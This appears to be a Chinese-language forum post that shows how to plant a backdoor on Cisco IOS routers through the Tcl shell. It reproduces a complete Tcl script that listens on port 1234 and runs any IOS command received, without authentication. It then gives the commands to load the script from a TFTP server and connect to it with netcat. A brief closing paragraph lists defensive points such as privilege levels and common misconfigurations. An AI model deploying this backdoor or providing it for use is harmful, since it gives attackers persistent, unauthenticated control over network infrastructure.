之前在 zone 里邊有人討論過CISCO 的后門問題我就說了個利用TCL cisco 的一個腳本處理技術詳見http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html現在給整理出來。鄭重聲明本人僅討論方法與該技術如利用此技術給他人造成的經濟損失與本人無關。 首先給出腳本此腳本非本人所寫國外已經有大牛寫出來了
# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh
在CISCO設備上運行如下命令需要有tftp
Router#tclsh
Router(tcl)#source tftp://1.1.1.2/backdoor.tcl
設備會變成假死狀態因此不建議在console下運行基本上也不可能,在其他機器上
nc 路由器IP 1234
附截圖一張
?
防御辦法其實這個功能本來是方便給網絡攻城獅批量配置和測試使用的。因此需要LV 15的權限因此只要LV15的權限還在就沒有太大問題。其實CISCO 設備的菊花還是不太好爆的除了有0day 基本上都是因為人為的配置不當產生的,常見的比如配置了可寫的但是很SB的SNMP,開放了一些不怎么使用或者有危險的服務.比如未授權的http 而且不用認證就可以跑配置出來或者使用了enable password 而不是 enable secret 設置密碼,要不就是使用了弱密碼,如果這些如果杜絕了基本上菊花差不多就可以保住了
?
?
?
?